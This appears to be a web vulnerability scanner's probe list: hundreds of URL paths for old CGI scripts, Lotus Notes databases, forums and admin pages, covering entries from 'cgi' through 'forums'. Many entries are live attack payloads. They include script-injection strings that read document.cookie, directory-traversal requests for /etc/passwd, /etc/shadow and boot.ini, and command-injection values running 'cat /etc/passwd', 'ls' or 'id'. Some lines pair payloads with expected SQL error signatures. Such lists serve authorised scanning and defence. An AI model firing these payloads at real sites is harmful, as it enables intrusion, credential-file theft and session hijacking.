cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-shl/win-c-sample.exe
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-sys/FormMail-clone.cgi
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
cgi-win/cgitest.exe
cgi-win/uploader.exe
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cgiproc?
cgicso?query=<script>alert('Vulnerable')</script>
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiforum.pl?thesection=../../../../../../../../../../etc
cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgimail.exe
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
cgitest.exe
cgiwrap
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@U
cgiwrap/~@USERS
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
chassis/config/GeneralChassisConfig.html
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
chat_dir/register.php
chatlog.nsf
checkout_payment.php
class/mysql.class
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clbusy.nsf
cldbdir.nsf
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
clickcount.pl?view=test
clickresponder.pl
client/
cliente/
clientes/
clients/
clocktower/
clusta4.nsf
clusterframe.jsp
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
cm/
cmd.exe?/c+dir
cmd1.exe?/c+dir
code.php
code.php3
code/
collect4.nsf
com
com/
com/novell/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
com5..........................................................................................................................................................................................................................box
com5.java
com5.pl
commandit.cgi
comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
commerce.cgi?page=../../../../../../../../../../etc
commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
common.php?f=0&ForumLang=../../../../../../../../../../etc
common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
common/listrec.pl
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
communicator/
communique.asp
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
compatible.cgi
compra/
compras/
compressed/
compte.php
conecta/
config.inc
config.php
config/
config/checks.txt
config/html/cnf_gi.htm
connect/
console
conspass.chl+
consport.chl+
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
contents.php?new_language=elvish&mode=select
contents/extensions/asp/1
convert-date.php
correo/
count.cgi
counter-ord
counter/
counter/1/n/n/0/3/5/0/a/123.gif
counterbanner
counterbanner-ord
counterfiglet-ord
counterfiglet/nc/
cp/rac/nsManager.cgi
cpa.nsf
cpanel/
cplogfile.log
cpqlogin.htm
credit/
crypto/
cs
csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csLive
csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csNews.cgi
csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csPassword.cgi
csPassword.cgi?command=remove%20
csPassword/csPassword.cgi
csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
csh
css
cstat.pl
cuenta/
cuentas/
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
custdata/
customerdata.nsf
customers/
cutecast/members/
cutenews/comments.php
cutenews/index.php?debug
cutenews/search.php
cutenews/shownews.php
cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cvsblame.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvslog.cgi?file=<script>alert('Vulnerable')</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
da.nsf
dan_o.dat
dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
dasp/fm_shell.asp
dat/
data.sql
data/
data/config/microsrv.cfg
data/fetch.php?page=
data/member_log.txt
data/userlog/log.txt
database.nsf
database/
database/db2000.mdb
database/metacart.mdb
database/metacart.mdb+
databases/
databse.sql
date
dato/
datos/
day5datacopier.cgi
day5datanotifier.cgi
db.nsf
db.php
db.php?q='&t='
db.sql
db/
db/users.dat
db2www/library/document.d2w/show
db4web_c/dbdirname//etc/passwd
db_manager.cgi
dbabble
dbase/
dbman/db.cgi?db=no-db
dbmlparser.exe
dc/auth_data/auth_user_file.txt
dc/orders/orders.txt
dcforum.cgi?az=list&forum=../../../../../../../../../../etc
dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
dclf.nsf
dcp/advertiser.php
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug/showproc?proc===<script>alert('Vulnerable');</script>
decsadm.nsf
decsdoc.nsf
decslog.nsf
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
default.nsf
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
defines.php
demo/
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
demo/ojspext/events/globals.jsa
demo/sql/index.jsp
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
demos/
dev/
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
devel/
development/
dfire.cgi
diagnose.cgi
diapo.php?rep=<script>alert(document.cookie)</script>
dig.cgi
dir/
dirassist.nsf
directory.php?dir=%3Bcat%20/etc/passwd
directory/
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
displayTC.pl
dltclnt.php
dms0
dnewsweb
do_map
do_subscribe
doc
doc-html/
doc/
doc/admin/index.php
doc/domguide.nsf
doc/dspug.nsf
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc/internet.nsf
doc/javapg.nsf
doc/lccon.nsf
doc/migrate.nsf
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/packages/
doc/readmec.nsf
doc/readmes.nsf
doc/rt/overview-summary.html
doc/smhelp.nsf
doc/srvinst.nsf
doc/webmin.config.notes
docs/
docs/<script>alert('Vulnerable');</script>
docs/NED
docs/NED?action=retrieve&location=.
docs/sdb/en/html/index.html
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
doladmin.nsf
dols_help.nsf
domadmin.nsf
domcfg.nsf
domguide.nsf
domlog.nsf
donothing
dose.pl?daily&somefile.txt&|ls|
dostuff.php?action=modify_user
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
down/
download.cgi
download.php?op=viewdownload
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
download/
downloads/
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
dspug.nsf
dumpenv.pl
easylog/easylog.html
echo.bat
echo.bat?&dir+c:\\
edit.pl
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
ejemplo/
ejemplos/
email.php
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emml_email_func.php
employees/
empower?DB=whateverwhatever
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail.cgi?type=.%00
emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
enter.cgi
entete.php
enteteacceuil.php
envia/
enviamail/
environ.cgi
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
error/HTTP_NOT_FOUND.html.var
error_log
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
es/
eshop.pl/seite=;cat%20eshop.pl|
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
etc/passwd
etc/shadow+
event.nsf
eventcal2.php.php
events.nsf
events4.nsf
events5.nsf
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
ews/ews/architext_query.pl
ex-logger.pl
examples/
examples/basic/servlet/HelloServlet
examples/context
examples/cookie
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
examples/jsp/snp/anything.snp
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp??
examples/servlet/AUX
examples/servlet/TroubleShooter
examples/servlets/index.html
examples/session
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
excel/
exchange/
exchange/lib/AMPROPS.INC
exchange/lib/ATTACH.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
exchange/lib/logon.inc
exchange/root.asp?acs=anon
excite
excite;IF
excite;IFS=\
exe/
exec/show/config/cr
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
ext.ini.%00.txt
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
ezadmin.cgi
ezboard.cgi
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
ezman.cgi
ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
ezshopper2/loadpage.cgi
ezshopper3/loadpage.cgi
faqman/index.php
faqmanager.cgi?toc=/etc/passwd%00
faxsurvey?cat%20/etc/passwd
fbsd/
fcgi-bin/echo
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
file-that-is-not-real-2002.php3
file/
file/../../../../../../../../etc/
fileadmin/
filemail
filemail.pl
filemanager/filemanager_forms.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
files/
finance.xls
finances.xls
finger
finger.pl
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
flexform
flexform.cgi
fom.cgi?file=<script>alert('Vulnerable')</script>
fom.cgi?file=<script>alert('XSS')</script>
fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
foo.php3
forgot_password.php?email=\"><script>alert(document.cookie)</script>
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
foro/YaBB.pl
fortune
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=/etc/passwd%00
forum-ra.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=c:\boot.ini
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum/
forum/admin/database/wwForum.mdb
forum/admin/wwforum.mdb
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
forum/mainfile.php
forum/member.php
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
forum/newreply.php
forum/newthread.php
forum/viewtopic.php
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=268
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=100
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
forums/
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
